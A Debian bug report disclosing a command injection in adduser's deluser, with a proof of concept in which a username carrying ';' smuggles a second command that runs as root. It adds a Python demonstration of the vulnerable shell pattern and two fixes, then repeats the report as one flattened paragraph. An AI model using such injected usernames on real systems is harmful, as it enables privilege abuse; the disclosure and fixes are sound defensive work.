Package: adduser
Version: 3.118
Severity: important

Dear Maintainer,

A command injection vulnerability has been found in the deluser program in the adduser package. When deleting a user via deluser with dangerous characters in its name (such as / and ;), the commands injected are interpreted by the shell when deluser invokes crontab.

This issue could be exploited most likely in systems that automatically allow adding/removing users (such as in an enterprise use case, where employees are deleted upon them quitting the org). If there are automated scripts/solutions in use where usernames can be arbitrarily changed, this can lead to remote code execution.

deluser should check & escape dangerous characters when invoking crontab (or simply adding -- onto the end of the crontab command line might work?)

Proof of concept (on a Live booted Debian):

$ sudo useradd $(echo -e "bob;/home/user/test")
# confirm bob's existence
$ grep bob /etc/passwd
$ cat /home/user/test
#!/bin/bash
touch /hacked
$ chmod +x /home/user/test
$ deluser
Enter a user name to remove: bob;/home/user/test
snipped output...
..
/usr/sbin/deluser: `/bin/crontab -r bob;/home/user/test' returned error code 1.  Exiting.
$ ls -l /hacked
-rw-r--r-- 1 root root 0 Sep 17 12:41 /hacked

-- System Information:
Debian Release: 10.1
  Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-6-amd64 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages adduser depends on:
ii  debconf [debconf-2.0]  1.5.71
ii  passwd                 1:4.5-1.1

adduser recommends no packages.

Versions of packages adduser suggests:
ii  liblocale-gettext-perl  1.07-3+b4
ii  perl                    5.28.1-6

-- debconf information:
  adduser/homedir-permission: true
  adduser/title:
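The defect pattern behind the report above, shown as an added example that is not code from the adduser package or from the reporter: deluser itself is written in Perl, but the bug class (interpolating a username into a single command string that a shell then parses) is the same in any language, so it is illustrated here in Python with subprocess. `echo` stands in for `crontab -r` so the script runs on any machine without touching real crontabs; the marker file path and the malicious username are constructed for the demonstration, and the allow-list regex is an assumption chosen to be conservative, not adduser's actual NAME_REGEX.

```python
"""Command injection through a shell-interpolated username, and two fixes.

Added example, not adduser's own code. "crontab -r <user>" is replaced by
"echo -r <user>" so nothing on the host is modified except a temp file.
"""
import os
import re
import subprocess
import tempfile

# Assumed allow-list for usernames: lowercase start, then [a-z0-9_-].
# Deliberately excludes '/' and ';' from the report, plus spaces and quotes.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]*$")


def remove_crontab_unsafe(user: str) -> None:
    """Vulnerable pattern: the username becomes part of a shell command line.

    A name like 'bob;/home/user/test' ends the first command at ';' and runs
    /home/user/test as a second command with the caller's privileges.
    Appending '--' to the command string would not help: '--' only stops
    option parsing in the child, it does not stop the shell honouring ';'.
    """
    subprocess.run(f"echo -r {user}", shell=True, check=False,
                   stdout=subprocess.DEVNULL)


def remove_crontab_argv(user: str) -> str:
    """Fix 1: pass the name as one argv element; no shell is involved.

    '--' stops option parsing so a name beginning with '-' cannot be read as
    a flag by the child. Returns the child's stdout for inspection.
    """
    proc = subprocess.run(["echo", "-r", "--", user], check=False,
                          capture_output=True, text=True)
    return proc.stdout


def remove_crontab_hardened(user: str) -> str:
    """Fix 2: additionally refuse names outside the allow-list before exec."""
    if not USERNAME_RE.match(user):
        raise ValueError(f"refusing to act on suspicious username {user!r}")
    return remove_crontab_argv(user)


def demo_injection() -> dict:
    """Run all three variants against an injected name and report the outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "hacked")   # constructed stand-in for /hacked
        user = f"bob;touch {marker}"           # constructed malicious username

        remove_crontab_unsafe(user)
        unsafe_created = os.path.exists(marker)
        if unsafe_created:
            os.remove(marker)

        argv_output = remove_crontab_argv(user)
        argv_created = os.path.exists(marker)

        try:
            remove_crontab_hardened(user)
            hardened_rejected = False
        except ValueError:
            hardened_rejected = True

    return {
        "unsafe_created": unsafe_created,            # shell ran the injected command
        "argv_created": argv_created,                # argv form: nothing executed
        "argv_saw_literal": ";touch" in argv_output,  # child got the raw string
        "hardened_rejected": hardened_rejected,      # allow-list refused the name
        "benign_ok": "bob" in remove_crontab_hardened("bob"),
    }


if __name__ == "__main__":
    for key, value in demo_injection().items():
        print(f"{key}: {value}")
```

The argv form alone closes the injection, because the kernel receives the username as a single argument and no shell ever tokenises it; the allow-list is defence in depth against the '/' and '-' cases (a name such as `../etc` or `-r` reaching a path or option parser elsewhere in the tool). Note that the `--` the reporter suggests is only meaningful in the argv form: in the original string-interpolated command it would be parsed by the shell after the `;` has already split the line.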
A command injection vulnerability has been found in the deluser program in the adduser package. When deleteing a user via deluser with dangerous characters in its name (such as / and ;), the commands injected are interpreted by the shell when deluser invokes crontab. This issue could be exploited most likely in systems that automatically allow adding/removing users ( such as in an enterprise usecase, where employees are deleted upon them quitting the org.) If there are automated scripts/solutions in use where usernames can be arbitarily changed, this can lead to remote code execution. deluser should check & escape dangerous characters when invoking crontab (or simple add -- onto the end of the crontab command line might work? proof of concept (on a Live booted debian): $ sudo useradd $(echo -e "bob;/home/user/test") #confirm bob's existance $ grep bob /etc/passwd $ cat /home/user/test #!/bin/bash touch /hacked $ chmod +x /home/user/test $ deluser Enter a user name to remove: bob;/home/user/test snipped output... .. /usr/sbin/deluser: `/bin/crontab -r bob;/home/user/test' returned error code 1. Exiting. $ ls -l /hacked -rw-r--r-- 1 root root 0 Sep 17 12:41 /hacked -- System Information: Debian Release: 10.1 Architecture: amd64 (x86_64) Kernel: Linux 4.19.0-6-amd64 (SMP w/1 CPU core) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) Versions of packages adduser depends on: ii debconf [debconf-2.0] 1.5.71 ii passwd 1:4.5-1.1 adduser recommends no packages. Versions of packages adduser suggests: ii liblocale-gettext-perl 1.07-3+b4 ii perl 5.28.1-6 -- debconf information: adduser/homedir-permission: true adduser/title: